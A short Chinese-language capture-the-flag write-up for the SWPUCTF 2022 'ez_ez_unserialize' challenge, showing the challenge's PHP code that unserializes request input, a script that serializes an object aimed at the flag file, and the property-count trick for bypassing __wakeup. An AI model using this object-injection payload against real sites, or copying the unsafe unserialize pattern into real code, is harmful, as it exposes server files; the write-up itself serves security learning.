复健第二天之[SWPUCTF 2022 新生赛]ez_ez_unserialize

打开题目在线环境直接看到源码:

php 复制代码
<?php
class X
{
    public $x = __FILE__;
    function __construct($x)
    {
        $this->x = $x;
    }
    function __wakeup()
    {
        if ($this->x !== __FILE__) {
            $this->x = __FILE__;
        }
    }
    function __destruct()
    {
        highlight_file($this->x);
        //flag is in fllllllag.php
    }
}
if (isset($_REQUEST['x'])) {
    @unserialize($_REQUEST['x']);
} else {
    highlight_file(__FILE__);
}

审计这些php代码,是反序列化,然后根据这个构造pop链:

php 复制代码
<?php

class X
{
    public $x = 'fllllllag.php';
}

$a = new X;
echo serialize($a);

?>

输出 的反序列化数据为:

*O:1:"X":1:{s:1:"x";s:13:"fllllllag.php";}

这里绕过weakup,修改 "X" 后的 1(成员属性数量) 大于 1(实际数量) 即可。

最后再用GET或者POST 方法传参得到flag。

相关推荐
Andya_net15 小时前
网络安全 | 深入了解OAuth 2.0原理
安全·web安全·github
半个西瓜.15 小时前
车联网安全:调试接口安全测试.
网络·安全·web安全·网络安全·车载系统
黄焖鸡能干四碗20 小时前
网络安全态势报告,网络安全风险评估报告文档
大数据·网络·安全·web安全·信息可视化·需求分析
huangwxiao1 天前
ATT&CK红队评估一
web安全·内网安全·红日靶场
上海云盾安全满满1 天前
支付网站屡遭CC攻击,高防ip能防CC攻击吗
tcp/ip·安全·web安全
东方隐侠安全团队-千里2 天前
第13节 93年高能所被入侵,开启中国网络安全发展进程
网络·安全·web安全
belldeep2 天前
网络安全:SQL 注入:SQLmap
web安全·sql注入·sqlmap
P***25392 天前
免费的Web安全漏洞扫描,工具
安全·web安全
y***54882 天前
免费的Web安全测试工具,可以替代Burp Suite
安全·web安全
2301_780789662 天前
WAF如何应对金融领域的网络威胁和黑客攻击
服务器·网络·安全·web安全·金融